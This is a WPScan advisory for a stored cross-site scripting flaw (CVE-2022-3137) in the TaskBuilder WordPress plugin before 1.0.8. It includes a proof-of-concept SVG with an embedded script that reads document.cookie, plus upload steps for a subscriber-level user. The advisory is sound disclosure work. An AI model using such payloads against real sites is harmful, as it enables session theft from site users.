WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

TaskBuilder < 1.0.8 - Subscriber+ Stored XSS via SVG file upload

Description

The plugin does not validate and sanitise task's attachments, which could allow any authenticated user (such as subscriber) creating a task to perform Stored Cross-Site Scripting by attaching a malicious SVG file

Proof of Concept

Create a SVG with the following content:

<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
   <script type="text/javascript">
      alert(document.cookie);
   </script>
</svg>

As any authenticated user, such as subscriber:
- Go to http://vuln.local/wp-admin/admin.php?page=wppm-tasks
- Choose any tasks (create one if there aren't any)
- Focus on "Write a comment".
- Click on "Attach Files" and select the SVG created above
- Click on "Send".
- View the attached SVG by clicking on its URL (https://example.com/?wppm_attachment=86&tid=1&tac=OtjI9JpnQU), which will trigger the XSS

Affects Plugins

taskbuilder
Fixed in version 1.0.8

References

CVE
CVE-2022-3137

Classification

Type

XSS

OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79

Miscellaneous

Original Researcher

Rizacan Tufan

Submitter

Rizacan Tufan

Submitter website
https://rizax.blog
Submitter twitter
r1z4x
Verified

Yes

WPVDB ID
524928d6-d4e9-4a2f-b410-46958da549d8

Timeline

Publicly Published

2022-09-15 (about 8 months ago)

Added

2022-09-15 (about 8 months ago)

Last Updated

2022-09-15 (about 8 months ago)

Our Other Services

WPScan WordPress Security Plugin